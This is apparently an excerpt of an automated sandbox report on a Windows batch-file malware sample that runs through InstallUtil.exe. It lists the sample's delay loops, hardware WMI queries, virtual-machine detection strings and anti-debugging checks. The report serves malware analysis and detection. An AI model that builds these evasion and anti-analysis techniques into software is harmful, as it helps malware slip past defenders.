                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -98232s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97607s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97499s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97280s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97171s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -97062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96587s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -96030s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95921s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95811s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95702s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95573s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95461s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95210s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -95093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94872s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94655s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94217s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -94109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -93999s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -93890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7252Thread sleep time: -93781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568Thread sleep count: 3097 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7624Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf TID: 7568Thread sleep count: 2005 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -23058430092136925s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808Thread sleep count: 3747 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7808Thread sleep count: 6081 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99719s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99479s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99375s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99264s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -99046s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98819s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98718s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98608s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98500s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98390s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -98047s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97937s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97718s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97609s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97495s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97358s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97244s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -97098s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -96531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -96349s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -96234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -96125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -96015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95351s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95249s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -95031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -94922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799967s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799749s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799640s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799530s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799419s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799258s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1799015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1798853s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1798746s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1798640s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7800Thread sleep time: -1798531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99762Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99433Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99320Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98979Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98872Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98715Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98604Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98393Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98232Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97607Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97280Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96587Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96030Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95921Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95811Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95573Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95461Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95210Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94872Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94655Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94217Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 93781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99479
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98608
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97495
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95351
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 95031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 94922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799967
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799419
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1799015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798853
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 1798531
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 18_2_014170B0 CheckRemoteDebuggerPresent,18_2_014170B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess token adjusted: DebugJump to behavior
